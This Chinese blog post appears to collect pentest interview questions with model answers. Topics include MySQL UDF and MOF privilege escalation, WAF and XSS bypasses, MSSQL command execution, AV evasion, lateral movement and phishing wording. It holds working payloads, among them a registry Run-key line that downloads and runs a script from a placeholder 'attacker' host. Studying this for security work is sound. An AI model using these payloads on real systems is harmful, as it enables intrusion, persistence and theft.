2025年渗透测试面试题总结-奇安信z-team(题目+回答)

安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。

目录

奇安信z-team 

1. MySQL UDF原理与默认plugin目录

2. MySQL 5.7 UDF限制绕过

3. 注入绕过WAF的方法

4. XSS中href属性双引号转义的利用

5. MSSQL命令执行绕过禁用xp_cmdshell

6. MOF提权

7. 免杀实践经验

8. 正反向代理区别

9. 拿站信息收集手段

10. 提权漏洞利用

11. 横向移动思路

12. 新漏洞跟踪与研究

13. 钓鱼话术设计

奇安信z-team 

1. mysql的udf的原理,默认有无plugin目录
2. mysql5.7版本udf不能执行命令怎么办
3. 注入时遇到了waf怎么绕过
4. xss中a标签里的href属性如果双引号被实体化转义了怎么利用
5. mssql中如果xp_cmdshell跟sp_configure都被禁用了怎么执行命令
6. mof提权
7. 有没有做过免杀
8. 正反向代理
9. 拿站的思路(主要是信息收集的手段)
10. 提权时用过那些漏洞
11. 打点后的横向移动思路
12. 平时有没有研究过新公开的一些漏洞
13. 钓鱼时的一些话术

1. MySQL UDF原理与默认plugin目录

原理

  • UDF(用户自定义函数)允许通过动态链接库(DLL/SO)扩展MySQL功能,攻击者可编写恶意函数(如sys_exec)执行系统命令。
  • 流程
    1. 将编译好的UDF库(如lib_mysqludf_sys.so )写入MySQL插件目录。
    2. 通过CREATE FUNCTION sys_exec RETURNS STRING SONAME 'udf.dll'; 注册函数。
    3. 调用SELECT sys_exec('whoami');执行命令。

默认plugin目录

  • Linux/usr/lib/mysql/plugin/(需secure_file_priv为空且MySQL用户有写入权限)。
  • WindowsC:\Program Files\MySQL\MySQL Server X.X\lib\plugin\(默认无写入权限,需提权)。

2. MySQL 5.7 UDF限制绕过

解决方案

  1. 检查secure_file_priv:若限制为NULL,尝试修改配置文件或使用SELECT @@secure_file_priv;定位可写路径。
  2. 替代提权方式
    • MOF提权:利用Windows管理规范(WMI)执行脚本。
    • 日志文件写入WebShell:通过general_log将恶意代码写入网站目录。
  3. 手动编译UDF:针对MySQL 5.7架构重新编译UDF库(如raptor_udf2.c)。

3. 注入绕过WAF的方法

常用技术

  1. 混淆与编码
    • URL编码%55nion代替Union
    • 注释符干扰/*!UNION*/SELECT(MySQL特性)。
  2. 分块传输:利用HTTP分块编码拆分恶意Payload。
  3. 时间盲注绕过:通过SLEEP(1)等时间函数绕过正则检测。
  4. 参数污染:重复参数(?id=1&id=1' AND 1=1--)混淆WAF解析。

4. XSS中href属性双引号转义的利用

绕过方法

  1. 无引号注入<a href=javascript:alert(1)>(依赖浏览器容错)。
  2. HTML实体二次解析
    html<a href="javascript:eval('alert&#40;1&#41;')"> 
  3. 伪协议与事件
    • data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
    • <a href="#" onmouseover=alert(1)>(利用事件触发)。

5. MSSQL命令执行绕过禁用xp_cmdshell

替代方案

  1. OLE自动化对象
    sqlDECLARE @shell INT; EXEC sp_oacreate 'WScript.Shell', @shell OUTPUT; EXEC sp_oamethod @shell, 'Run', NULL, 'cmd /c whoami'; 
  2. CLR集成:上传恶意DLL并创建CLR存储过程。
  3. PowerShell调用
    sqlEXEC xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run','payload','REG_SZ','powershell -c "IEX (New-Object Net.WebClient).DownloadString(''http://attacker/shell.ps1'')"'; 

6. MOF提权

原理:通过Windows管理规范(WMI)定时执行恶意代码。
步骤

  1. 上传恶意MOF文件(如evil.mof )至C:/Windows/system32/wbem/mof/
  2. MOF文件内容:
    mof#pragma namespace("\\\\.\\root\\subscription") instance of __EventFilter as $Filter { EventNamespace = "Root\\Cimv2"; Name = "TestFilter"; Query = "SELECT * FROM __InstanceModificationEvent WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"; }; instance of CommandLineEventConsumer as $Consumer { Name = "TestConsumer"; CommandLineTemplate = "calc.exe"; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $Filter; }; 
  3. 系统自动编译执行,常用于Windows Server 2003/2008提权。

7. 免杀实践经验

技术分类

  1. 静态免杀
    • 代码混淆:对Shellcode进行AES加密或XOR异或。
    • 合法签名伪装:劫持白签名进程(如svchost.exe )。
  2. 动态免杀
    • 进程注入:通过CreateRemoteThread注入到合法进程(如explorer.exe )。
    • 无文件攻击:内存加载PE文件(如PowerShell反射加载)。

8. 正反向代理区别

类型正向代理反向代理
角色代理客户端请求(隐藏客户端IP)代理服务端响应(隐藏服务器架构)
典型场景突破访问限制(如翻墙)负载均衡、CDN加速
配置示例用户手动设置代理服务器地址Nginx配置proxy_pass到后端服务

9. 拿站信息收集手段

核心步骤

  1. 子域名爆破:使用subfinderamass结合证书透明度日志(CT Logs)。
  2. 端口扫描masscan快速识别开放服务(如445、6379、8080)。
  3. 目录爆破dirsearch探测敏感路径(/admin/backup)。
  4. 指纹识别Wappalyzer识别CMS(如Shiro、ThinkPHP)。
  5. GitHub泄露:搜索目标公司代码仓库中的API密钥、配置文件。

10. 提权漏洞利用

常见漏洞

  1. Linux:Dirty Cow(CVE-2016-5195)、Polkit(CVE-2021-3560)。
  2. Windows:Print Spooler(CVE-2021-1675)、AlwaysInstallElevated策略。
  3. 数据库:MySQL UDF提权、MSSQL xp_cmdshell滥用。

11. 横向移动思路

关键路径

  1. 凭证窃取:通过Mimikatz抓取内存密码或Hash(Pass-the-Hash)。
  2. 漏洞扩散:利用内网漏洞(如SMB漏洞MS17-010)。
  3. 服务扫描:识别内网Redis、Jenkins、WebLogic等脆弱服务。
  4. 隐蔽隧道:使用DNS/ICMP隧道绕过流量监控。

12. 新漏洞跟踪与研究

跟踪渠道

  1. 漏洞库:CVE、NVD、Exploit-DB。
  2. 社区:GitHub PoC仓库、Twitter安全研究员(如@pentest_swissky)。
  3. 实战复现:搭建漏洞环境(如Log4Shell)测试利用链。

13. 钓鱼话术设计

典型场景

  1. 伪装通知
  2. 福利诱导
  3. 紧急威胁
  4. 内部文件
    • “财务部最新预算表,请查收附件:budget.xls (含宏病毒)”。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值